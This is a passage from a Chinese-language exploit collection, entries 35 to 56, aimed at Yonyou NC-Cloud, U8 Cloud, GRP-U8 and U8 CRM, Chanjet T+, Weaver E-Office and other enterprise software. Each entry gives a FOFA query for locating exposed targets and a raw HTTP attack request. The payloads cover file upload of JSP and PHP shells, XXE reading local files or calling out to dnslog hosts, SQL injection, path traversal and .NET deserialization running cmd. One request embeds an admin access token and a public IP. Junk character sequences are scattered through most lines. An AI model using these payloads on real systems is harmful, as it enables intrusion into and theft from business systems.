Accept-Encoding: gzip, deflate/ @0 {5 i' x# d& _
Accept: */*
- K: `2 i$ \! y- v1 D) B6 ?Connection: keep-alive
- f' k1 E1 b' c* f2 a% o w$ E# Z" l5 q" V Z
% ~1 g$ [3 t, m: C5 R
35. 用友NC-Cloud importhttpscer任意文件上传
5 ^: g9 J: H6 _# ?% T* vFOFA:app="用友-NC-Cloud"0 v' ~( ?9 v3 ^( P! i! D
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1& q% k' `% ^2 ]) w
Host: 203.25.218.166:8888
4 I1 T% e5 X; C+ lUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info* b6 K9 A* `, p% |) N. D
Accept-Encoding: gzip, deflate
" U( L a( ]# P# ?- ]Accept: */*
+ j5 ^3 Q; c6 ]# }( SConnection: close( g+ E$ I% G3 W% O7 ]
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
$ M L! i0 A; m5 k- PContent-Length: 190" w, W1 G/ `& i- N- R6 }( p; f9 j
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0' \2 g! p& g0 W3 n! R4 u( }/ G
$ i4 K3 b( C" f( S3 \) O6 s--fd28cb44e829ed1c197ec3bc71748df0
1 _2 o# @4 y, T l E9 NContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
q2 B7 a" b. h
. d- E: ]" k3 H3 O<%out.println(1111*1111);%>7 N; f& ?- V p- n4 j/ c$ N
--fd28cb44e829ed1c197ec3bc71748df0--
1 Z/ h [* o$ I3 L( M2 K* W# k" J
$ @0 @8 b! e! u36. 用友NC-Cloud soapFormat XXE
9 C1 ]$ @+ b' BFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
9 u( ?# x+ f2 ~# q$ i% a DPOST /uapws/soapFormat.ajax HTTP/1.1
2 n @: }8 _. IHost: 192.168.40.130:8989
# v6 @( j) ?! HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
) g& m; a% M# I: d1 w" gContent-Length: 263
& L2 p9 m; v( n. j# s6 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: T! W+ v; s: p" U. zAccept-Encoding: gzip, deflate8 j2 _. n( c( l6 b8 }3 o# w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 g- Y. i# u4 l$ P
Connection: close+ K$ H0 W( m1 ?6 ~" `% p
Content-Type: application/x-www-form-urlencoded
4 f" g# |9 U v0 n3 \$ @Upgrade-Insecure-Requests: 1
7 E r+ j/ U0 _$ K5 |! J. g
0 V( x3 e, S% @# o5 l" cmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
' f6 U$ Z3 a& Q h! M$ G; V* a6 Q
/ V0 X, v! Q. F
37. 用友NC-Cloud IUpdateService XXE$ H2 R; j* I( K
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
9 o5 e5 b K3 z: i3 wPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1- J2 x' S6 h# w/ w% o
Host: 192.168.40.130:8989
2 ?6 }+ f- J# x! t/ V9 k3 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36' U/ W3 F1 |) d! ?5 n! n( x
Content-Length: 421* B! s, `6 j4 Z- X5 h- S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
# P+ l( \7 \* G% b1 jAccept-Encoding: gzip, deflate J7 g* K. f4 t# o" y ]1 j: r
Accept-Language: zh-CN,zh;q=0.9: U: P2 d2 E" F& l1 h( B- {, o
Connection: close" o+ H! _) q1 t9 h" V
Content-Type: text/xml;charset=UTF-8
5 j" i/ E- i" E6 C; V3 l" oSOAPAction: urn:getResult/ E( P& D' t" @& q; W
Upgrade-Insecure-Requests: 1* U. h4 R0 C2 Y" e8 M' o
: |0 {0 [' R# _
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
0 n2 \4 u% Y6 O<soapenv:Header/>
, q E- e- p4 i; e<soapenv:Body>( g- p: B; R! C( b& p" ?
<iup:getResult>
# k) x) ~7 Z, T<!--type: string--> }5 X' L# N3 Q% c- B
<iup:string><![CDATA[
7 x. O5 ^3 ~8 M/ M4 b<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
# n8 N( X8 t" j' h( s# e# [8 A<xxx/>]]></iup:string>- F r4 }* U5 [9 E
</iup:getResult>
4 ?2 L3 _) t$ u! W</soapenv:Body>9 Z0 O2 _6 @' _* ?( ?+ t9 D/ S4 J
</soapenv:Envelope>
; L; O- C5 o7 t# }3 n- H( v: c) P! G* s% U4 g$ H( g
, |( G! F8 a. Y' ~; v3 H( W. j, r
" u4 D; v/ K" r3 K
38. 用友U8 Cloud smartweb2.RPC.d XXE; O$ E* |( ]5 g# x5 u& ^" _ [
FOFA:app="用友-U8-Cloud"
$ G; q# ^3 J- Q$ KPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
2 V: P M8 t/ e* p7 s$ THost: 192.168.40.131:8088
9 Y& y, X# m( C% d9 j6 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
: Q; ~7 ? Q* V3 x) N& G' EContent-Length: 260
p$ \0 w5 o, w" U# u6 r% u7 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
7 O, d( N. Y) G/ L h; }Accept-Encoding: gzip, deflate4 x8 ?: p- s! v3 ~* P5 w, w4 P6 h
Accept-Language: zh-CN,zh;q=0.96 _: J# m# M( V& y; N
Connection: close
% p# o! w- Q4 j5 R3 u9 t% J' hContent-Type: application/x-www-form-urlencoded8 h$ W) d% y: V9 b7 b* d
: `) ^! e" p9 {) D% g__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
. L6 S) h: u; y7 Q4 L# ]9 |. Q
+ P8 x. v% M2 ^6 K5 h# o
39. 用友U8 Cloud RegisterServlet SQL注入
* V" o h% t) v; RFOFA:title="u8c"% P8 V1 T, W3 F+ }
POST /servlet/RegisterServlet HTTP/1.1
! g2 G: i/ [- F; d* c6 GHost: 192.168.86.128:8089
6 w0 q9 }0 X+ H6 z8 z d7 f( PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.361 q5 d) I6 a/ G2 F
Connection: close! [* U* u6 I$ ?$ Y, C- J) V6 \5 P
Content-Length: 85
, ^6 J+ H( f# X0 LAccept: */*
( ^7 v7 o! v- ~2 A, MAccept-Language: en
( _% Y4 _3 h. e' B0 ^Content-Type: application/x-www-form-urlencoded1 \, f- J2 B4 E
X-Forwarded-For: 127.0.0.1
/ y( M1 P' s8 Q. @% nAccept-Encoding: gzip
9 C( z" W3 }# V% x4 z- H$ o/ i% t; r5 R: {# u- c- M
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
# P3 P4 k0 _9 |) t) V" {0 r* T: I3 Y _
' Z1 c) b0 z8 d8 v% ~" k
40. 用友U8-Cloud XChangeServlet XXE9 \- d& T5 ?) H/ b8 P5 k [! k
FOFA:app="用友-U8-Cloud"
: _4 S# e0 b& v+ p+ [POST /service/XChangeServlet HTTP/1.1& x3 ?4 q0 O, X8 v. @+ ^
Host: x.x.x.x- D. q& l( W3 D- A; O6 T1 U
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.368 t$ h6 ~+ M# r! S2 D% r; r; _ |
Content-Type: text/xml/ C- `1 v& r3 q; j- Q
Connection: close
+ u- G5 e( t4 m/ }6 s- V
1 L0 g/ h' z" D+ E0 I9 b6 x<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
$ ?: H& F& [0 i9 ~4 P7 L+ q# T0 p, ?! ? C0 Y! `* {( s+ e. o( h- N! o
' r( G7 K7 w$ f7 [$ ~" d7 g) d
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
% ^, _ z9 C h# GFOFA:app="用友-U8-Cloud", I) s4 }6 O: ~5 p2 n
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
! L( W4 Y" j3 v) cHost:
+ |( \ q$ M( Z9 ~' JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% I. d' d" C" ?# K( t
Content-Type: application/json
( D1 R) P0 e+ n/ r. RAccept-Encoding: gzip
4 M! q" g: H4 C( j" A# hConnection: close* }3 F# f! J/ ]: I1 t
" a7 G3 U7 Z ~' x1 S% f" f( l2 J9 ]
P' S' p9 I# t2 a42. 用友GRP-U8 SmartUpload01 文件上传- u" m$ Y8 \7 g: d; q
FOFA:app="用友-GRP-U8"0 T2 n6 H: G: z! W
POST /u8qx/SmartUpload01.jsp HTTP/1.1
- m! k( A% A/ e* AHost: x.x.x.x
2 G5 \4 v, P; ]6 fContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
' z% ^- T* J& t5 \7 xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
$ D4 \1 T5 D* \! F1 K3 Z5 ^# a( [' @( A0 n8 b4 d$ K9 o
PAYLOAD
! D) o, K! J' F. L0 C# o
$ H! U$ o% f) l3 i' m9 q' Q8 K, D: ~' N7 I3 U
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml7 T/ R8 W h9 A9 L/ O6 }) s- y
7 i `0 N2 X2 X n) b' U
43. 用友GRP-U8 userInfoWeb SQL注入致RCE1 T" J" N- K2 R6 i, A: @7 {
FOFA:app="用友-GRP-U8"
G/ z2 X! v! }9 {+ y1 f2 N: rPOST /services/userInfoWeb HTTP/1.1
6 X' A2 X5 U+ T; V! lHost: your-ip
* v2 g6 n* P1 j0 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
. J6 O2 |: p+ O; a+ a: B1 XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 E, m3 ]7 K9 L, W% q' e' R
Accept-Encoding: gzip, deflate# ^ K) ]! s g! r8 N7 u
Accept-Language: zh-CN,zh;q=0.9
( n! u8 v+ N) iConnection: close
. R+ M) M" P4 R1 C8 W8 P, Z$ |SOAPAction:
. t& Z' Y+ f- A5 J' G. n3 l D2 `Content-Type: text/xml;charset=UTF-8
( u2 I. L* A, M
" }& I' M/ j: Z7 k+ M8 q<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
1 R( b& N+ X! n9 j) y. j <soapenv:Header/>1 C+ \! P& j. X, O7 {+ g& W+ `! ]
<soapenv:Body>! R- M+ J2 x* I( C" L
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
: n' ~) J0 R, ]$ |3 e+ ^7 K <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
' z2 H; Q8 y8 V. B) ?# }1 s </ser:getUserNameById>1 R/ ?9 R% o* Y
</soapenv:Body># k2 r1 U: k i" Q: G
</soapenv:Envelope>
8 B8 P, a8 e6 b$ V% g; q: F4 T; l5 F) E2 z% t+ ~9 B
8 l" v6 o: |! Y& }( w$ ^ P7 H
44. 用友GRP-U8 bx_dj_check.jsp SQL注入; b2 M( N* B) w9 F2 ~
FOFA:app="用友-GRP-U8"8 U4 v$ g. |: T2 z
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
. O2 A: [4 Q( I% X7 ^$ X- |+ h5 IHost: your-ip# `' _- W9 t5 b0 }4 [$ W9 k, W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36( \& v) W# K: ^' z6 @7 q& |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( B% k) o. }1 }% x( y8 bAccept-Encoding: gzip, deflate
& u& ]! P4 n9 ~7 { ?$ }; TAccept-Language: zh-CN,zh;q=0.9
! B: X( q4 q- |; _4 [4 Z+ x$ q3 [) EConnection: close( [2 ^2 l3 n, u& ^, C
u% S5 r8 f5 M
( y1 Y0 w; F1 \" [8 E; Q45. 用友GRP-U8 ufgovbank XXE
/ F! u0 W" e7 N: hFOFA:app="用友-GRP-U8" s, X3 ~" U, f6 q
POST /ufgovbank HTTP/1.1- n" Z2 b6 s( Q8 y) X) H
Host: 192.168.40.130:222
$ V0 s& R3 L+ O6 i4 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
1 e8 l U, |7 l. ~; |( W: bConnection: close# U2 |8 f' Q8 E' D1 e% T
Content-Length: 161 t( n5 g: P: I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! p0 `) ]# k5 \3 c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! w: s) D9 H% p6 S* o% C( cContent-Type: application/x-www-form-urlencoded
6 F; Z$ O2 j# ^8 W8 F! E9 cAccept-Encoding: gzip( [( Y0 u9 L8 T$ ?
* x: Y$ _7 a- F1 ZreqData=<?xml version="1.0"?>
& R! u5 j* T( {9 c* t5 A<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest! Z6 h, G6 V- ^2 j: i$ {
+ U' j. ~# d: e. t. m
% f: q8 Z3 Z5 i& g46. 用友GRP-U8 sqcxIndex.jsp SQL注入9 _7 R# j) k1 G4 h
FOFA:app="用友-GRP-U8". i; h, N' p, q' _3 p
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1# L q# W: s" O: S
Host: your-ip( J; A4 M( E/ {; R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36, R Y9 H+ M u/ W' {! X' G$ b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( \* u, O& D. d) Q
Accept-Encoding: gzip, deflate
. Q1 k8 ?' G4 T2 u: vAccept-Language: zh-CN,zh;q=0.9
9 s! U5 c4 w7 S0 Y, GConnection: close
. p( Y6 [ g u, Y( k8 P" ^& E% E. j1 l$ |
* f) {0 @1 t# ~. t47. 用友GRP A++Cloud 政府财务云 任意文件读取
9 K2 V% b) @! ]$ j2 J4 P, R* [% {8 _FOFA:body="/pf/portal/login/css/fonts/style.css"
4 Z8 N% R) t$ i# _2 P G# iGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1; @8 y; W3 D( B% P
Host: x.x.x.x! ?6 n4 ?, {7 O9 h8 }# `5 b6 ~+ W
Cache-Control: max-age=0( w, @. V+ _6 i0 Q# u) Y& `" G
Upgrade-Insecure-Requests: 12 [, c6 M, ^3 B2 N8 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
, E) P8 A1 [9 `8 t5 R) }- F7 C! iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; A8 l1 l: t) @
Accept-Encoding: gzip, deflate, br' s0 i9 H/ {+ P# v( F, i: o
Accept-Language: zh-CN,zh;q=0.97 Z$ P% o. f$ t4 I+ a7 Q
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
3 G; v; p& x# F& B+ \1 a8 B; ^Connection: close* k7 r" w: c- O, X
7 {3 m( l) [5 `) O- Q. }- A" A% ^0 P- ]+ Z5 b. r
3 [% t( K" W# Y48. 用友U8 CRM swfupload 任意文件上传
1 _ j8 a, n& w% N5 B/ B" [" [' _FOFA:title="用友U8CRM"7 |0 ]- W% D! G) e4 |5 x! @
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
$ h. q r& I4 ]+ ~' X( D* xHost: your-ip4 D. R, m% }1 ^9 f. W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
& ^. V# S0 M& K+ \ n hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 Q0 L! E- x/ I; s1 W; x, B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* @( D% v8 V5 p$ A7 j! ~/ \
Accept-Encoding: gzip, deflate7 V1 S0 @ b. v* ?; C4 w* N
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855$ I- V7 A# t2 v' }' Q
------269520967239406871642430066855
* l6 k9 P3 _% R3 r" iContent-Disposition: form-data; name="file"; filename="s.php"
. z4 r3 _- |0 w! Q6 u( _1231& T% \, p- s& J3 k$ a N
Content-Type: application/octet-stream
: B& g0 c6 A8 B: k% T------269520967239406871642430066855
0 V {. N0 @- e3 e: c2 o u. EContent-Disposition: form-data; name="upload"$ P( ?; J7 Z7 E8 i
upload
% `6 l$ k: ], `- K E$ R$ K------269520967239406871642430066855--' V: Z0 j* M- q! h8 ?
: X8 c, ~: ?. d
3 o! l8 Q! v. M7 n, P+ V: X
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
# |# z' i: B3 Z' nFOFA:body="用友U8CRM"; [: h" b$ k) R$ i9 i
6 x8 a" s- ~7 sPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
; O, }1 }; J. _Host: x.x.x.x; u: J% ?8 w4 X4 q( }- ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" A& m2 [! l) B; c6 f' t. Y
Content-Length: 329+ g' n. w! h2 s0 \ i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 P' o/ q& \! ~" Z0 A" r0 b( R
Accept-Encoding: gzip, deflate
2 d" h+ p5 `5 P3 R) t9 s* H/ {% Z2 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# S T% F8 _, G! [1 S) Z1 B- \5 ^
Connection: close; C* E1 I7 X) R1 ?0 J/ {, u. j' g* g
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
2 {/ b, I+ @; g; t) k" E
+ `5 k8 Q0 @4 V1 e+ D-----------------------------vvv3wdayqv3yppdxvn3w3 l4 E3 g& M" a9 n9 Q" D
Content-Disposition: form-data; name="file"; filename="%s.php "
1 q/ j6 u7 d/ ^( R1 W/ kContent-Type: application/octet-stream
* h9 m" }- d8 i# E# G: _& a, O
0 T+ T! u* j6 x) I! N& s6 ^6 {wersqqmlumloqa: O) Q5 T% R3 Q1 l9 o# e
-----------------------------vvv3wdayqv3yppdxvn3w% p9 e; K# B* f0 Z0 ]
Content-Disposition: form-data; name="upload"! v1 ^1 G0 d6 C2 t5 @( _0 g j
: _/ t1 J$ w, D" n
upload
4 ]- P4 D6 [5 |- d. h-----------------------------vvv3wdayqv3yppdxvn3w--7 u2 ?# S9 ^; ^
! G9 e0 n' s# h- \0 R
) s/ {6 K% r3 Ghttp://x.x.x.x/tmpfile/updB3CB.tmp.php
5 h3 q! d2 r1 ]: R- S, N5 G7 L3 S9 N- g
50. QDocs Smart School 6.4.1 filterRecords SQL注入
+ B2 ^- a6 q4 b% }* k# S5 qFOFA:body="close closebtnmodal"
6 q6 X8 N/ g$ @ b ~POST /course/filterRecords/ HTTP/1.1
7 a8 k9 H% u7 @/ wHost: x.x.x.x* e5 [1 N8 q/ \
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
2 C1 {3 S, S' d1 x4 M9 _. @' Q+ v3 [8 `Connection: close
4 {0 K9 K5 y5 xContent-Length: 224# Q. n, W5 M* ^( D( s( J$ F
Accept: */*
& X5 u6 C% _6 iAccept-Language: en
1 T5 k% Y0 D }2 \) t2 e. O( ?Content-Type: application/x-www-form-urlencoded8 k" W% b# ?% ^% h3 M+ H
Accept-Encoding: gzip, r# b T! B9 b: M8 r+ E5 _
% ~1 @8 G6 b. @: f, }5 n
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1. y! W! u7 }1 v
" t( |% A1 T* Q [
. i5 |9 x# F6 N: L51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
+ c6 d6 Z3 E7 }# P6 W9 BFOFA:app="云时空社会化商业ERP系统" e1 B! J" T9 a0 y- h' E
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1( a! k' c3 @7 @4 {$ L g& c
Host: your-ip
- X6 R! T9 Z( X8 `) \User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
# [) l" p3 D) p2 G* mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
% z/ `: Z2 b$ s2 Z9 ]) K3 V9 CAccept-Encoding: gzip, deflate
4 f% _% A( J& d( t* w1 {Accept-Language: zh-CN,zh;q=0.9
7 @# _9 n# m' K* L/ y MConnection: close
, c9 L) L" D2 `# p
, V2 M2 R# q& Z
# h# K" \1 d4 T52. 泛微E-Office json_common.php sql注入
1 q; y1 y0 |1 aFOFA:app="泛微-EOffice"
$ R2 ^0 l" M q7 sPOST /building/json_common.php HTTP/1.1/ N5 y0 Z6 B b3 \+ R: D
Host: 192.168.86.128:8097) O9 w" w4 b+ t: C
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 ]" S9 `3 H9 @8 h0 }% b# S
Connection: close& s$ S2 D' p( o: Y5 q
Content-Length: 87
. X9 f. ]& M# b; X# G7 C( W# c9 o: cAccept: */*
' o) T% ]4 m0 F9 K$ A, H; r) a; tAccept-Language: en
* `5 x, A( K4 Z& mContent-Type: application/x-www-form-urlencoded6 l; d+ E8 N" X* }( ^: s S/ y% r
Accept-Encoding: gzip* i! U. [: o/ |* C8 l
2 e6 m8 F- n9 d7 ?8 V+ Ytfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333! J- J- l1 ]. P- ]6 r, u2 I, T
; c6 j+ o+ t4 u) o1 H6 t- v( H4 M% w3 N9 y+ P; g9 l: T& t5 o
53. 迪普 DPTech VPN Service 任意文件上传* ]% D% f( ~' ]) ^
FOFA:app="DPtech-SSLVPN"
, T! ^* B/ l3 U9 m$ ^/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
5 ]% m$ h1 ^0 F) n X% B0 l1 B J4 n$ [- f0 O
$ p0 l, {6 Y& b- P4 k4 ~1 F54. 畅捷通T+ getstorewarehousebystore 远程代码执行; B: P& S7 ^; c# S7 t8 Y
FOFA:app="畅捷通-TPlus"# \4 B, M. R9 b
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件& G6 A- t- V$ u6 i
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
$ R9 A) j+ e6 ]
/ i9 J; k: e7 X( a: A0 O f
$ f0 D7 _9 u* G7 k完整数据包1 E# h' L, ?8 v$ [ v
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1+ ]0 A. q2 ]7 E9 a7 A
Host: x.x.x.x
9 E1 b* t# t1 W# O& P, M* ?User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
- }1 Z' G! X! z6 V0 k8 eContent-Length: 593
6 R, s9 U& \. E5 q% c, ~% X. h3 V$ Q+ ^" f/ I: R' j8 s
{+ q, v. ?7 N8 R+ z
"storeID":{
, \0 T% ]( d; F/ i* o "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
6 {8 H: M) Z0 u! h" C& M "MethodName":"Start",5 C; [( @7 x9 f+ b* f3 i8 D- v2 D W
"ObjectInstance":{$ z- x( d: P6 U
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",/ B# ]0 g, s4 S. w; E
"StartInfo":{
) Y% N. c2 ?1 g; }" z7 Q7 L "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
3 s4 p( K* ?0 G8 s0 N$ Q5 g "FileName":"cmd",2 a! S( r9 D: |% ? @$ a p
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt": B7 \3 h5 F' K- C" t
}
4 X% ?- l% k! e+ l' a% }3 R( l }
2 L; q6 e8 z0 s0 ~ q% @ }2 J9 x/ }) P" O8 r0 t+ l7 k
}" D5 }+ D0 }" p5 w& q" U
5 V6 B; e' D) v
9 V( V( M' S" f第二步,访问如下url
1 O$ |0 Z7 @2 g( N6 v/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
+ j* G9 d8 Q$ h* J8 b- p. O
8 K+ N7 T+ M! H/ p! ?5 _& P4 y/ q/ J* R2 V
55. 畅捷通T+ getdecallusers信息泄露
_" F* d+ e: u1 MFOFA:app="畅捷通-TPlus"
+ I5 C; D9 u) x' m0 D第一步,通过
8 o. _1 v1 X) I6 d4 Y8 z7 [5 h/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
! {; `, A% L) V, p3 b第二步,利用获取到的Cookie请求
6 \; C' N( A6 S k/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
# H- H. r# i- G8 T
: i2 t* Z A& [ @+ g56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE4 s% C# _% P V& h7 j0 y
FOFA: app="畅捷通-TPlus"& v4 e: R* L5 f
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1& n7 b; M) |5 N7 \% Q# q, h% J
